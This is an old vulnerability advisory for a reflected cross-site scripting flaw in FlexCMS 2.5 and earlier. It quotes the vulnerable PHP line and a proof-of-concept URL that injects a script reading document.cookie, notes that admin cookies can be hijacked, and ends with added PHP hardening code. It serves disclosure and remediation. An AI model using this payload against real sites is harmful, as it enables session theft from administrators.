FlexCMS "PreviousColorsString" Cross-Site Scripting :: 2008-08-18
----------------------------------------------------------------
Script : FlexCMS <= 2.5
Type : Cross Site Scripting Vulnerability
Alert : Low
----------------------------------------------------------------
Download From : http://www.flexcms.com/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerability :
File Name : inc-core-admin-editor-previouscolorsjs.php
Vulnerable Variable : PreviousColorsString
Send Method : GET
Register_globals : On
Dangerous PHP Code (LINE 53) :
print 'document.write(\''.$PreviousColorsString.'\');';
Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script>
Attacker can hijack admin cookie with this vulnerability ....
Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ...
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
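
Added example (not FlexCMS code and not the advisory author's patch): the print statement from line 53 beside a hardened form. The value lands inside a single-quoted JavaScript string that document.write() then parses as HTML, so the sketch encodes for both contexts; the function names and the sample value are hypothetical, and the JSON_HEX_* and ENT_SUBSTITUTE flags assume PHP 5.4 or later.

```php
<?php
// Added example. Only the print statement shape and the variable name
// PreviousColorsString come from the advisory; everything else is assumed.

// Vulnerable form quoted in the advisory (line 53). With register_globals On,
// $PreviousColorsString can be filled directly from the query string.
function render_vulnerable($PreviousColorsString)
{
    return 'document.write(\'' . $PreviousColorsString . '\');';
}

// Hardened form. The caller passes the value explicitly instead of relying
// on register_globals to create the variable.
function render_hardened($value)
{
    // Context 1: document.write() parses its argument as HTML, so the text
    // is HTML-encoded. ENT_QUOTES also encodes the single quote, which the
    // default flags of htmlspecialchars() before PHP 8.1 leave untouched.
    $html = htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Context 2: the text sits inside a JavaScript string literal.
    // json_encode() emits a complete quoted literal; the HEX flags turn
    // < > & ' " into \uXXXX escapes so nothing can close the string or
    // the enclosing script element.
    $js = json_encode($html, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    if ($js === false) {
        $js = '""'; // encoding failed: write an empty string
    }

    return 'document.write(' . $js . ');';
}

// Constructed sample value containing each metacharacter that matters in
// the two contexts: single quote, angle brackets, double quote, ampersand.
$sample = "#ff0000,'<b>\"&";

echo "vulnerable: ", render_vulnerable($sample), PHP_EOL;
echo "hardened:   ", render_hardened($sample), PHP_EOL;
```

Comparing the two printed lines shows the single quote from the sample ending the string literal early in the first and appearing only as an escaped entity in the second.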